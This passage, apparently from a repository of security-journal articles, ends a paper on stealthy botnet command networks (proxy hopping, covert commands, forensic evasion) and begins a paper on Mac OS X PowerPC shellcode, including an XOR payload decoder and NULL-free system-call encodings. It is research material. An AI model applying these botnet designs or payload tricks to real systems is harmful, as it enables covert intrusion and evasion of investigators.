can't be traced, then it is required that he be able to communicate
|
||||
with 5 nodes only and that he must know address information about
|
||||
the nodes. If the attacker doesn't have a clue which IP addresses
|
||||
his nodes have, how can he tell 5 of them where to connect to?
|
||||
Besides the obvious problem of timing, of course. If the nodes poll
|
||||
for a new command file once every 24 hours, he'd have to wait 24
|
||||
hours in the worst case until the last node finds out it's supposed
|
||||
to bind a port and forward the connection to somewhere else.
|
||||
|
||||
|
||||
4.1) The Linked Network
|
||||
|
||||
Though I called this approach a passive network, as the nodes idle
|
||||
and wait for commands to come to them, this type of botnet is in
|
||||
fact quite active. The mechanisms described now will not (easily)
|
||||
work when most of the nodes are on dynamic IP addresses. It is thus
|
||||
more interesting for nodes installed after exploiting some kind of
|
||||
server software. Of course, while not solving the uptime problem, a
|
||||
rogue dyndns account can always give a dynamic IP a static hostname.
|
||||
|
||||
|
||||
|
||||
This kind of network focuses on all of its nodes forming some kind
|
||||
of self-organizing peer to peer network. A node that infects some
|
||||
other host can send over the botnet program and make the new host
|
||||
link to itself, thus becoming that node's parent. This technique can
|
||||
make the infected hosts form a sort of tree structure over time, as
|
||||
each newly infected host tries to link to the infecting host.
|
||||
Updates, information, and commands can be transmitted using this
|
||||
worm network to reach each node, no matter which node it was sent
|
||||
from, as each node informs both child nodes as well as its parent
|
||||
nodes. In its early (or final) stages, a network of this type might
|
||||
look like this piece of ascii art:
|
||||
|
||||
Level
|
||||
0 N
|
||||
/ \
|
||||
1 N N
|
||||
/ \ /
|
||||
2 N N N
|
||||
|
||||
To make sure a 'successful' node that infects lots of hosts doesn't
|
||||
become the parent of all of those hosts, nodes must refuse link
|
||||
requests from child nodes after a certain number have been linked
|
||||
(say 5). The parent can inform the would-be child to link
|
||||
to one of its already established children instead. By keeping track
|
||||
of the number of nodes linked to each location in the tree, a parent
|
||||
can even try to keep the tree that's hierarchically below it well
|
||||
balanced. This way a certain node would know about its parent and up
|
||||
to 5 children, thus keeping the number of other hosts that someone
|
||||
who compromises a node learns about rather low, while still having a
|
||||
network that's as effective as possible. Depending on the number of
|
||||
nodes in the entire network, the number of children that may link to
|
||||
a parent node could be easily changed to make the network scale
|
||||
better. As each node may be some final link as well as a parent
|
||||
node, every host runs the same program. There's no need for special
|
||||
'client' and 'server' nodes.
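
As a rough illustration of how the per-parent link limit affects scaling, the
sketch below computes how many levels a perfectly balanced tree needs for a
given node count. The function name and the sample numbers are assumptions made
for illustration; the text itself only suggests a limit of 5.

```python
def levels_needed(total_nodes, fanout):
    """Return how many levels below the root a perfectly balanced tree
    needs in order to hold total_nodes nodes (illustrative helper)."""
    if total_nodes < 1 or fanout < 2:
        raise ValueError("need at least one node and a fan-out of 2 or more")
    capacity = 1      # nodes held so far (just the root)
    level_size = 1    # nodes on the current deepest level
    depth = 0
    while capacity < total_nodes:
        level_size *= fanout      # each node on the last level gets `fanout` children
        capacity += level_size
        depth += 1
    return depth


if __name__ == "__main__":
    for fanout in (5, 10):
        print(fanout, levels_needed(1000, fanout))
```

Under these assumptions, a larger limit flattens the tree, so a message crosses
fewer hops, but every node then holds the addresses of more neighbors.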
|
||||
|
||||
|
||||
What's the problem with a tree structure? Well, what if a parent
|
||||
fails? Say a node has 3 children, each having 2 children of its own.
|
||||
Now this node fails because the owner decides to reinstall the host.
|
||||
Are we left with 3 networks that can't communicate with each other
|
||||
any more? Not necessarily. While possibly giving a forensics expert
|
||||
information on additional hosts, to increase reliability each node
|
||||
has to know about at least one more upstream node that it can try to
|
||||
link to if its parent is gone. An ideal candidate could be the
|
||||
parent's parent. In order to make sure that all nodes are still
|
||||
linked to the network, a periodic (once a day) sort of ``ping''
|
||||
through the entire network has to happen in any case. By giving a
|
||||
child node the IP of its ``grandparent'', the direct parent of the
|
||||
child node always knows that the fail-over node, the one its kids
|
||||
will try to link to if it should fail, is still up and running.
|
||||
|
||||
|
||||
Though this may help to address the issue of parent death, another
|
||||
issue remains. If the topmost node fails, there are no more
|
||||
upstream nodes that the children could link to. That's why in this
|
||||
case the children should have the IP of one(!) of their siblings as
|
||||
the fail-over address so that they can make this one the new top
|
||||
node in the case of a fail-over condition. Making use of the
|
||||
node-based ping, each node also knows how many of its children are
|
||||
still up and running. By including this number into the ping sent to
|
||||
the parent, the topmost node could always tell the number of linked
|
||||
hosts. In order to not have to rely on connecting to the topmost
|
||||
node to collect this type of information, a simple command can be
|
||||
implemented to make the topmost node report this info to any node on
|
||||
the network that asks for it. Using a public key stored into all the
|
||||
nodes, it's even possible to encrypt every piece of information
|
||||
that's destined for the botnet owner, making sure that no one besides
|
||||
the owner can decrypt the data. Although this type of botnet may
|
||||
give a forensics expert or someone with a sniffer information on
|
||||
other nodes that are part of the network, it also offers fast
|
||||
response times and more flexibility in the (ab)use of the network
|
||||
compared to the previous approach with the unlinked nodes. It's a
|
||||
sort of trade off between the biggest possible level of anonymity on
|
||||
one hand, and flexibility on the other. It is a huge step up
|
||||
compared to all of the zombies sitting on IRC servers right now,
|
||||
where a single channel contains the zombies of the entire botnet.
Employing cryptography to store the IPs of the child and parent
nodes, and keeping those IPs only in RAM, mitigates the problem
|
||||
further.
|
||||
|
||||
|
||||
Once a drone network of this type has been established with several
|
||||
hundreds of hosts, there are lots of possibilities of putting it to
|
||||
use. To conceal the originating IP address of a connection, hopping
|
||||
over several nodes of the drone network to a target host can be
|
||||
easily accomplished. A command packet tells one node to bind a port.
|
||||
Once it receives a connection on it, it is told to command a second
|
||||
node to do the same, and from then on node 1 forwards all the
|
||||
traffic to node 2. Node 2 does the same, and forwards to node 3,
|
||||
then 4, maybe 5, until finally the last node connects to the
|
||||
intended destination IP. By encrypting the entire connection from
|
||||
the original source IP address up to the last node, a possible
|
||||
investigator sniffing node 2 will not see the commands (and thus the
|
||||
IP addresses) which tell node 3 to connect to node 4, node 4 to node
|
||||
5, and of course especially not the destination host's address. An
|
||||
idle timeout makes sure that connections don't stay up forever.
|
||||
|
||||
|
||||
As manually updating several hundreds or thousands of hosts is
|
||||
tedious work, an easy updating system should be coded into the
|
||||
nodes. There are basically two possible ways to realize that. A
|
||||
command, distributed from node to node all over the network, could
|
||||
make each node replace itself with a newer version which it may
|
||||
download from a certain HTTP address. The other way is by updating
|
||||
the server software on one node, which in turn distributes this
|
||||
update to all the nodes it's linked to (children and
|
||||
parent), which do just the same. Cryptographic signatures are a must
|
||||
of course to make sure someone doesn't replace all of the precious
|
||||
nodes with SETI@home. Vlad902 suggested a simple and effective way
|
||||
to do that. Each node gets an MD5 hash hardcoded into it. Whenever
|
||||
someone offers a software update, it will download the first X bytes
|
||||
and see whether they hash to the hardcoded value. If they do, the
|
||||
update will be installed. Of course, a forensics expert may extract
|
||||
the hash out of an identified node. However, due to the nature of
|
||||
cryptographic hashes, he won't be able to tell which byte sequence
|
||||
generates that hash. This will prevent the forensics expert from
|
||||
creating a malicious update to take down the network. As the value
|
||||
used to generate the hash has to be considered compromised after an
|
||||
update, each update has to supply a new hash value to look out for.
|
||||
|
||||
|
||||
Further security mechanisms could include making the network
|
||||
completely memory resident, and parents keeping track of kids, and
|
||||
reinfecting those if necessary. What never hit the hard-disk can
|
||||
obviously not be found by forensics. Also, commands should be
|
||||
time-stamped to make sure a certain command will only work once, and
|
||||
replay attacks (sending a sniffed command packet to trigger a
|
||||
response from a node) will fail. Using public key cryptography to
|
||||
sign and encrypt data and communication is always a nice idea too,
|
||||
but it also has 2 disadvantages:
|
||||
|
||||
- It usually produces quite a big overhead to incorporate into the code.
|
||||
- Holding the one and only private key matching a public key that's been
|
||||
found on hundreds of hacked hosts is quite incriminating evidence.
|
||||
|
||||
An additional feature could be the incorporation of globally unique
|
||||
identifiers into the network, providing each node with a unique ID
|
||||
that's set upon installation on each new victim. While the network
|
||||
master would have to keep track of host addresses and unique IDs, he
|
||||
could use this feature to his advantage. Imagine a sort of
|
||||
traceroute within the node network. The master wants to know where a
|
||||
certain host is linked to. Every node knows the IDs of all of the
|
||||
child nodes linked hierarchically below it. So he asks the topmost
|
||||
node to find out the path to the node he's interested in. The
|
||||
topmost node realizes it's linked somewhere under child 2, and in
|
||||
turn asks child 2. This node knows it's linked somewhere below child
|
||||
4, and so on and so on. In the end, the master gets his information,
|
||||
a couple of IDs, while no node that's not directly linked to another
|
||||
gets to know the IPs of further hosts that are linked to the
|
||||
network.
|
||||
|
||||
|
||||
Since a portscan shouldn't reveal a compromised host, a raw socket
|
||||
must be used to sniff command packets off the wire. Also, command
|
||||
packets should be structured as unsuspiciously as possible, to make it
|
||||
look like the host just got hit by yet another packet of ``internet
|
||||
background noise''. DNS replies or certain values in TCP SYN packets
|
||||
could do the trick.
|
||||
|
||||
|
||||
4.2) The Hybrid
|
||||
|
||||
There is a way to combine both the anonymity of an unlinked network
|
||||
with the quick response time of the linked approach. This can be
|
||||
done by employing a technique first envisioned in the description of
|
||||
a so-called ``Warhol Worm''. While no node knows anything about
|
||||
other nodes, the network master keeps track of the IPs of infected
|
||||
hosts. To distribute a command to a couple or maybe all of the
|
||||
nodes, he first of all prepares an encrypted file containing the IPs
|
||||
of all active nodes, and combines that with the command to execute.
|
||||
He then sends this command file to the first node on the list. This
|
||||
node executes the command, removes itself from the list, and goes top
|
||||
to bottom through the list, until it finds another active node,
|
||||
which it transmits the command file to. This way each node will only
|
||||
get to know about other nodes when receiving command files, which are
|
||||
subsequently erased after the file has been successfully transmitted
|
||||
to another node. By calling certain nodes by their unique IDs, it's
|
||||
even possible to make certain nodes take different actions than all
|
||||
the others. By preparing different files and sending them to
|
||||
different nodes at start already, quite a fast distribution time can
|
||||
be achieved. Of course, should someone manage to not only sniff
|
||||
the command file, but also decrypt it, he has an entire list of
|
||||
infected hosts. Someone sniffing a node will still also see an
|
||||
incoming connection from somewhere, and an outgoing connection to
|
||||
somewhere else, and thus get to know about 2 more nodes. That's just
|
||||
the same as depicted in the passive approach. What's different is
|
||||
that a binary analysis of a node will not divulge information on
|
||||
another host of the network. As sniffing is probably more of a
|
||||
threat than binary analysis though, and considering a linked network
|
||||
offers way more flexibility, the Hybrid is most likely an inferior
|
||||
approach.
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
When it comes to botnets, the malcode development is still in its
|
||||
infancy, and while today's networks are very basic and easily
|
||||
detected, the reader should by now have realized that there are far
|
||||
better and stealthier ways to link compromised hosts into a network.
|
||||
And who knows, maybe one or more advanced networks are already in
|
||||
use nowadays, and even though some of their nodes have been spotted
|
||||
and removed already, the network itself has just not been identified
|
||||
as being one yet.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
The Honeynet Project. Know Your Enemy: Tracking Botnets.
|
||||
http://www.honeynet.org/papers/bots/
|
||||
|
||||
Weaver, Nicholas C. Warhol Worms: The Potential for Very
|
||||
Fast Internet Plagues.
|
||||
http://www.cs.berkeley.edu/~nweaver/warhol.html
|
||||
|
||||
Paxson, Vern, Stuart Staniford, and Nicholas Weaver. How to
|
||||
0wn the Internet in Your Spare Time.
|
||||
http://www.icir.org/vern/papers/cdc-usenix-sec02/
|
||||
|
||||
Zalewski, Michael. Writing Internet Worms for Fun and
|
||||
Profit.
|
||||
http://www.securitymap.net/sdm/docs/virus/worm.txt
|
510
uninformed/1.6.txt
Normal file
|
@ -0,0 +1,510 @@
|
|||
|
||||
Mac OS X PPC Shellcode Tricks
|
||||
H D Moore
|
||||
hdm[at]metasploit.com
|
||||
Last modified: 05/09/2005
|
||||
|
||||
0) Foreword
|
||||
|
||||
Abstract:
|
||||
|
||||
Developing shellcode for Mac OS X is not particularly difficult, but there are
|
||||
a number of tips and techniques that can make the process easier and more
effective. The independent data and instruction caches of the PowerPC processor
|
||||
can cause a variety of problems with exploit and shellcode development. The
|
||||
common practice of patching opcodes at run-time is much more involved when the
|
||||
instruction cache is in incoherent mode. NULL-free shellcode can be improved by
|
||||
taking advantage of index registers and the reserved bits found in many
|
||||
opcodes, saving space otherwise taken by standard NULL evasion techniques. The
|
||||
Mac OS X operating system introduces a few challenges to unsuspecting
|
||||
developers; system calls change their return address based on whether they
|
||||
succeed and oddities in the Darwin kernel can prevent standard execve()
|
||||
shellcode from working properly with a threaded process. The virtual memory
|
||||
layout on Mac OS X can be abused to overcome instruction cache obstacles and
|
||||
develop even smaller shellcode.
|
||||
|
||||
Thanks:
|
||||
|
||||
The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx, and
|
||||
the entire Uninformed Journal staff.
|
||||
|
||||
1) Introduction
|
||||
|
||||
With the introduction of Mac OS X, Apple has been viewed with mixed feelings by
|
||||
the security community. On one hand, the BSD core offers the familiar Unix
|
||||
security model that security veterans already understand. On the other, the
|
||||
amount of proprietary extensions, network-enabled software, and growing mass of
|
||||
advisories is giving some a cause for concern. Exploiting buffer overflows,
|
||||
format strings, and other memory-corruption vulnerabilities on Mac OS X is a
|
||||
bit different from what most exploit developers are familiar with. The
|
||||
incoherent instruction cache, combined with the RISC fixed-length instruction
|
||||
set, raises the bar for exploit and payload developers.
|
||||
|
||||
On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac
|
||||
for Fun and Profit". B-r00t's paper covered the basics of Mac OS X shellcode
|
||||
development and built on the PowerPC work by LSD, Palante, and Ghandi. This
|
||||
paper is an attempt to extend, rather than replace, the material already
|
||||
available on writing shellcode for the Mac OS X operating system. The first
|
||||
section covers the fundamentals of the PowerPC architecture and what you need
|
||||
to know to start writing shellcode. The second section focuses on avoiding NULL
|
||||
bytes and other characters through careful use of the PowerPC instruction set.
|
||||
The third section investigates some of the unique behavior of the Mac OS X
|
||||
platform and introduces some useful techniques.
|
||||
|
||||
2) PowerPC Basics
|
||||
|
||||
The PowerPC (PPC) architecture uses a reduced instruction set consisting of
|
||||
32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can only
|
||||
be executed by the processor if the opcode is word-aligned in memory.
|
||||
|
||||
|
||||
2.1) Registers
|
||||
|
||||
PowerPC processors have thirty-two 32-bit general-purpose registers (r0-r31;
64-bit PowerPC processors have 64-bit general-purpose registers, but still use
32-bit opcodes), thirty-two 64-bit floating-point registers (f0-f31), a link
|
||||
register (lr), a count register (ctr), and a handful of other registers for
|
||||
tracking things like branch conditions, integer overflows, and various machine
|
||||
state flags. Some PowerPC processors also contain a vector-processing unit
|
||||
(AltiVec, etc), which can add another thirty-two 128-bit registers to the set.
|
||||
|
||||
|
||||
On the Darwin/Mac OS X platform, r0 is used to store the system call number, r1
|
||||
is used as a stack pointer, and r3 to r7 are used to pass arguments to a system
|
||||
call. General-purpose registers between r3 and r12 are considered volatile and
|
||||
should be preserved before the execution of any system call or library
|
||||
function.
|
||||
|
||||
;;
|
||||
;; Demonstrate execution of the reboot system call
|
||||
;;
|
||||
main:
|
||||
li r0, 55 ; #define SYS_reboot 55
|
||||
sc
|
||||
|
||||
2.2) Branches
|
||||
|
||||
Unlike the IA32 platform, PowerPC does not have a call or jmp instruction.
|
||||
Execution flow is controlled by one of the many branch instructions. A branch
|
||||
can redirect execution to a relative address, absolute address, or the value
|
||||
stored in either the link or count registers. Conditional branches are
|
||||
performed based on one of four bit fields in the condition register. The count
|
||||
register can also be used as a condition for branching and some instructions
|
||||
will automatically decrement the count register. A branch instruction can
|
||||
automatically set the link register to be the address following the branch,
|
||||
which is a very simple way to get the absolute address of any relative location
|
||||
in memory.
|
||||
|
||||
;;
|
||||
;; Demonstrate GetPC() through a branch and link instruction
|
||||
;;
|
||||
main:
|
||||
|
||||
xor. r5, r5, r5 ; xor r5 with r5, storing the value in r5
|
||||
; the condition register is updated by the . modifier
|
||||
ppcGetPC:
|
||||
bnel ppcGetPC ; branch if condition is not-equal, which will be false
|
||||
; the address of ppcGetPC+4 is now in the link register
|
||||
|
||||
mflr r5 ; move the link register to r5, which points back here
|
||||
|
||||
|
||||
2.3) Memory
|
||||
|
||||
Memory access on PowerPC is performed through the load and store instructions.
|
||||
Immediate values can be loaded to a register or stored to a location in memory,
|
||||
but the immediate value is limited to 16 bits. When using a load instruction on
|
||||
a non-immediate value, a base register is used, followed by an offset from that
|
||||
register to the desired location. Store instructions work in a similar fashion;
|
||||
the value to be stored is placed into a register, and the store instruction
|
||||
then writes that value to the address held in a base register plus an offset.
|
||||
Multi-word memory instructions exist, but are considered bad practice to use,
|
||||
since they may not be supported in future PowerPC processors.
|
||||
|
||||
Since each PowerPC instruction is 32 bits wide, it is not possible to load a
|
||||
32-bit address into a register with a single instruction. The standard method
|
||||
of loading a full 32-bit value requires a load-immediate-shift (lis) followed
|
||||
by an or-immediate (ori). The first instruction loads the high 16 bits, while
|
||||
the second loads the lower 16 bits. (Some people prefer to use
add-immediate-shift against the r0 general-purpose register. The r0 register
has a special property in that anytime it is used for addition or subtraction,
it is treated as a zero, regardless of the current value.) 64-bit PowerPC
|
||||
processors require five separate instructions to load a 32-bit immediate value
|
||||
into a general-purpose register. This 16-bit limitation also applies to
|
||||
relative branches and every other instruction that uses an immediate value.
|
||||
|
||||
;;
|
||||
;; Load a 32-bit immediate value and store it to the stack
|
||||
;;
|
||||
main:
|
||||
|
||||
lis r5, 0x1122 ; load the high bits of the value
|
||||
; r5 contains 0x11220000
|
||||
|
||||
ori r5, r5, 0x3344 ; load the low bits of the value
|
||||
; r5 now contains 0x11223344
|
||||
|
||||
stw r5, 20(r1) ; store this value to SP+20
|
||||
lwz r3, 20(r1) ; load this value back to r3
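
The arithmetic behind the lis/ori pair can be checked with a small sketch. The
Python below is not part of the original paper; the function names are
hypothetical, and the model assumes a 32-bit register and the zero-extended
immediate that ori uses.

```python
def split_for_lis_ori(value):
    """Split a 32-bit value into the 16-bit immediates for lis and ori."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("value must fit in 32 bits")
    hi16 = (value >> 16) & 0xFFFF   # immediate for lis
    lo16 = value & 0xFFFF           # immediate for ori
    return hi16, lo16


def emulate_lis_ori(hi16, lo16):
    """Model what a 32-bit register holds after lis followed by ori."""
    reg = (hi16 << 16) & 0xFFFFFFFF  # lis: immediate shifted left 16, low half zero
    reg |= lo16                      # ori: zero-extended immediate ORed into low half
    return reg


if __name__ == "__main__":
    hi, lo = split_for_lis_ori(0x11223344)
    print(hex(hi), hex(lo), hex(emulate_lis_ori(hi, lo)))
```

Because ori zero-extends its immediate, the low half needs no sign adjustment,
which is one reason this pairing is the usual choice.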
|
||||
|
||||
|
||||
2.4) L1 Cache
|
||||
|
||||
The PowerPC processor uses one or more on-chip memory caches to accelerate
|
||||
access to frequently referenced data and instructions. This cache memory is
|
||||
separated into a distinct data and instruction cache. Although the data cache
|
||||
operates in coherent mode on Mac OS X, shellcode developers need to be aware of
|
||||
how the data cache and the instruction cache interoperate when executing
|
||||
self-modifying code.
|
||||
|
||||
As a superscalar architecture, the PowerPC processor contains multiple
|
||||
execution units, each of which has a pipeline. The pipeline can be described as
|
||||
a conveyor belt in a factory; as an instruction moves down the belt, specific
|
||||
steps are performed. To increase the efficiency of the pipeline, multiple
|
||||
instructions can be put on the belt at the same time, one behind another. The
|
||||
processor will attempt to predict which direction a branch instruction will
|
||||
take and then feed the pipeline with instructions from the predicted path. If
|
||||
the prediction was wrong, the contents of the pipeline are trashed and correct
|
||||
instructions are loaded into the pipeline instead.
|
||||
|
||||
This pipelined execution means that more than one instruction can be processed
|
||||
at the same time in each execution unit. If one instruction requires the output
|
||||
of another, a gap can occur in the pipeline while these dependencies are
|
||||
satisfied. In the case of a store instruction, the contents of the data cache
|
||||
will be updated before the results are flushed back to main memory. If a load
|
||||
instruction is executed directly after the store, it will obtain the
|
||||
newly-updated value. This occurs because the load instruction will read the
|
||||
value from the data cache, where it has already been updated.
|
||||
|
||||
The instruction cache is a different beast altogether. On the PowerPC platform,
|
||||
the instruction cache is incoherent. If an executable region of memory is
|
||||
modified and that region is already loaded into the instruction cache, the
|
||||
modified instructions will not be executed unless the cache is specifically
|
||||
flushed. The instruction cache is filled from main memory, not the data cache.
|
||||
If you attempt to modify executable code through a store instruction, flush the
|
||||
cache, and then attempt to execute that code, there is still a chance that the
|
||||
original, unmodified code will be executed instead. This can occur because the
|
||||
data cache was not flushed back to main memory before the instruction cache was
|
||||
filled.
|
||||
|
||||
The solution is a bit tricky: you must use the "dcbf" instruction to flush
each block of memory from the data cache, wait for the flush to complete
with the "sync" instruction, and then invalidate the instruction cache for that
block with "icbi". Finally, the "isync" instruction needs to be executed before
|
||||
the modified code is actually used. Placing these instructions in any other
|
||||
order may result in stale data being left in the instruction cache. Due to
|
||||
these restrictions, self-modifying shellcode on the PowerPC platform is rare
|
||||
and often unreliable.
|
||||
|
||||
The example below is a working PowerPC shellcode decoder included with the
|
||||
Metasploit Framework (OSXPPCLongXOR).
|
||||
|
||||
;;
|
||||
;; Demonstrate a cache-safe payload decoder
|
||||
;; Based on Dino Dai Zovi's PPC decoder (20030821)
|
||||
;;
|
||||
main:
|
||||
xor. r5, r5, r5 ; Ensure that the cr0 flag is always 'equal'
|
||||
bnel main ; Never taken (cr0 is 'equal'), but lr is still set
|
||||
mflr r31 ; Move the address of this instruction into r31
|
||||
addi r31, r31, 68+1974 ; 68 = distance from branch -> payload
|
||||
; 1974 is null eliding constant
|
||||
subi r5, r5, 1974 ; We need this for the dcbf and icbi
|
||||
lis r6, 0x9999 ; XOR key = hi16(0x99999999)
|
||||
ori r6, r6, 0x9999 ; XOR key = lo16(0x99999999)
|
||||
addi r4, r5, 1974 + 4 ; Move the number of words to decode into r4
|
||||
mtctr r4 ; Set the count register to the word count
|
||||
|
||||
xorlp:
|
||||
lwz r4, -1974(r31) ; Load the encoded word from memory into r4
|
||||
xor r4, r4, r6 ; XOR this word against our key in r6
|
||||
stw r4, -1974(r31) ; Store the modified word back to memory
|
||||
dcbf r5, r31 ; Flush the modified word to main memory
|
||||
.long 0x7cff04ac ; Wait for the data block flush (sync)
|
||||
icbi r5, r31 ; Invalidate prefetched block from i-cache
|
||||
|
||||
subi r30, r5, -1978 ; Move to next word without using a NULL
|
||||
add. r31, r31, r30
|
||||
|
||||
bdnz- xorlp ; Decrement ctr and branch while it is nonzero
|
||||
.long 0x4cff012c ; Wait for i-cache to synchronize (isync)
|
||||
|
||||
; Insert XORed payload here
|
||||
.long (0x7fe00008 ^ 0x99999999)
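
To see why the decoder biases its offsets by 1974, it helps to look at the
assembled bytes. The sketch below is an illustration only, not part of the
Metasploit decoder: it encodes D-form instructions by hand (primary opcode 14
for addi, 32 for lwz) and checks each word for NULL bytes. The helper names are
hypothetical.

```python
import struct

ADDI, LWZ = 14, 32      # primary opcodes of the two D-form instructions used here
NULL_ELIDE = 1974       # the bias constant from the listing


def d_form(opcode, rt, ra, imm):
    """Encode a D-form instruction: opcode(6) | rt(5) | ra(5) | imm(16)."""
    return (opcode << 26) | (rt << 21) | (ra << 16) | (imm & 0xFFFF)


def has_null(word):
    """True if any byte of the big-endian 32-bit word is 0x00."""
    return 0 in struct.pack(">I", word)


plain_addi = d_form(ADDI, 31, 31, 68)                # addi r31, r31, 68
biased_addi = d_form(ADDI, 31, 31, 68 + NULL_ELIDE)  # addi r31, r31, 68+1974
plain_lwz = d_form(LWZ, 4, 31, 0)                    # lwz r4, 0(r31)
biased_lwz = d_form(LWZ, 4, 31, -NULL_ELIDE)         # lwz r4, -1974(r31)
encoded_word = 0x7FE00008 ^ 0x99999999               # placeholder payload word, XORed

if __name__ == "__main__":
    for name, word in [("plain addi", plain_addi), ("biased addi", biased_addi),
                       ("plain lwz", plain_lwz), ("biased lwz", biased_lwz),
                       ("encoded word", encoded_word)]:
        print("%-12s 0x%08x null=%s" % (name, word, has_null(word)))
```

Small immediates leave a zero high byte in the 16-bit field; adding the bias in
one place and subtracting it in another keeps both bytes of every immediate
nonzero without changing the effective address.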
|
||||
|
||||
3) Avoiding NULLs
|
||||
|
||||
One of the most common problems encountered with shellcode development in
|
||||
general and RISC processors in particular is avoiding NULL bytes in the
|
||||
assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge,
|
||||
mostly due to the variable-length instruction set and multiple opcodes
|
||||
available for a given task. Fixed-width opcode architectures, like PowerPC,
|
||||
have fixed field sizes and often pad those fields with all zero bits.
|
||||
Instructions that have a set of undefined bits often set these bits to zero as
|
||||
well. The result is that many of the available opcodes are impossible to use
|
||||
with NULL-free shellcode without modification.
|
||||
|
||||
On many platforms, self-modifying code can be used to work around NULL byte
|
||||
restrictions. This technique is not useful for single-instruction patching on
|
||||
PowerPC, since the instruction pre-fetch and instruction cache can result in
|
||||
the non-modified instruction being executed instead.
|
||||
|
||||
|
||||
3.1) Undefined Bits
|
||||
|
||||
To write interesting shellcode for Mac OS X, you need to use system calls. One
|
||||
of the first problems encountered with the PowerPC platform is that the system
|
||||
call instruction assembles to 0x44000002, which contains two NULL bytes. If we
|
||||
take a look at the IBM PowerPC reference for the 'sc' instruction, we see that
|
||||
the bit layout is as follows:
|
||||
|
||||
010001 00000 00000 0000 0000000 000 1 0
------ ----- ----- ---- ------- --- - -
  A      B     C    D      E     F  G H
|
||||
|
||||
These 32 bits are broken down into eight specific fields. The first field (A),
|
||||
which is 6 bits wide, must be set to the value 17. The bits that make up B, C,
|
||||
and D are all marked as undefined. Field E must be set to either 1 or 0.
|
||||
Fields F and H are undefined, and G must always be set to 1. We can modify the
|
||||
undefined bits to anything we like, in order to make the corresponding byte
|
||||
values NULL-free. The first step is to reorder these bits along byte boundaries
|
||||
and mark what we are able to change.
|
||||
|
||||
? = undefined
|
||||
# = zero or one
|
||||
[010001??] [????????] [????0000] [00#???1?]
|
||||
|
||||
The first byte of this instruction can be either 68, 69, 70, or 71 ('D', 'E', 'F', or 'G'). The
|
||||
second byte can be any character at all. The third byte can either be 0, 16,
|
||||
32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, or 240 (which
|
||||
contains '0', 'P', and 'p', among others). The fourth byte can be any of the
|
||||
following values: 2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31,
|
||||
34, 35, 38, 39, 42, 43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see,
|
||||
it is possible to create thousands of different opcodes that are all treated by
|
||||
the processor as a system call. The same technique can be applied to almost any
|
||||
other instruction that has undefined bits. Although the current line of PowerPC
|
||||
chips used with Mac OS X seems to ignore the undefined bits, future processors
|
||||
may actually use these bits. It is entirely possible that undefined bit abuse
|
||||
can prevent your code from working on newer processors.
|
||||
|
||||
;;
|
||||
;; Patching the undefined bits in the 'sc' opcode
|
||||
;;
|
||||
main:
|
||||
li r0, 1 ; sys_exit
|
||||
li r3, 0 ; exit status
|
||||
.long 0x45585037 ; sc patched as "EXP7"
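The byte map above can be turned into a mask test. The Python sketch below is only an illustration derived from that map: the constants SC_FIXED_MASK and SC_FIXED_BITS and the helper names are our own, and they say nothing about how any particular processor treats the undefined bits.

```python
import struct

# Bits that the byte map [010001??] [????????] [????0000] [00#???1?]
# does not allow us to change, and the values they must hold.
SC_FIXED_MASK = 0xFC000FC2
SC_FIXED_BITS = 0x44000002  # the plain 'sc' encoding


def is_sc_variant(word: int) -> bool:
    """True if word only differs from 'sc' in the changeable bits."""
    return (word & SC_FIXED_MASK) == SC_FIXED_BITS


def is_null_free(word: int) -> bool:
    """True if none of the four big-endian bytes of word is 0x00."""
    return b"\x00" not in struct.pack(">I", word)


for candidate in (0x44000002, 0x45585037):
    print(hex(candidate), struct.pack(">I", candidate),
          is_sc_variant(candidate), is_null_free(candidate))
```

Counting the choices per byte in the map (4, 256, 16, and 32) gives 524,288 encodings, of which 489,600 contain no NULL byte, so there is plenty of room to pick bytes that survive a given filter.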
|
||||
|
||||
|
||||
3.2) Index Registers
|
||||
|
||||
On the PowerPC platform, immediate values are encoded using all 16 bits. If the
|
||||
assembled value of your immediate contains a NULL, you will need to find another
|
||||
way to load it into the target register. The most common technique is to first
|
||||
load a NULL-free value into a register, then subtract that value minus the
|
||||
difference to your immediate.
|
||||
|
||||
;;
|
||||
;; Demonstrate index register usage
|
||||
;;
|
||||
main:
|
||||
li r7, 1999 ; place a NULL-free value into the index
|
||||
subi r5, r7, 1999-1 ; subtract our value minus the target
|
||||
; the r5 register is now set to 1
|
||||
|
||||
If you have a rough idea of the immediate values you will need in your
|
||||
shellcode, you can take this a step further. Set your initial index register to
|
||||
a value that, when decremented by the immediate value, actually results in a
|
||||
character of your choice. If you have two distant ranges (1-10 and 50-60), then
|
||||
consider using two index registers. The example below demonstrates an index
|
||||
register that works for the system call number as well as the arguments,
|
||||
leaving the assembled bytes NULL-free. As you can see, besides the four bytes
|
||||
required to set the index register, this method does not significantly increase
|
||||
the size of the code.
|
||||
|
||||
;;
|
||||
;; Create a TCP socket without NULL bytes
|
||||
;;
|
||||
main:
|
||||
li r7, 0x3330 ; 0x38e03330 = NULL-free index value
|
||||
subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket
|
||||
subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain
|
||||
subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type
|
||||
subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol
|
||||
.long 0x45585037 ; patched 'sc' instruction
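The opcodes in the comments above can be reproduced by hand. The following Python sketch encodes the D-form 'addi' instruction (primary opcode 14), of which 'li' and 'subi' are simplified mnemonics, and checks each word for NULL bytes. The function names are hypothetical helpers written for this illustration.

```python
import struct


def addi(rd: int, ra: int, simm: int) -> int:
    """Encode 'addi rD, rA, SIMM' (D-form, primary opcode 14)."""
    if not -0x8000 <= simm <= 0x7FFF:
        raise ValueError("immediate does not fit in 16 signed bits")
    return (14 << 26) | (rd << 21) | (ra << 16) | (simm & 0xFFFF)


def li(rd: int, value: int) -> int:
    """'li rD, value' is 'addi rD, 0, value'."""
    return addi(rd, 0, value)


def subi(rd: int, ra: int, value: int) -> int:
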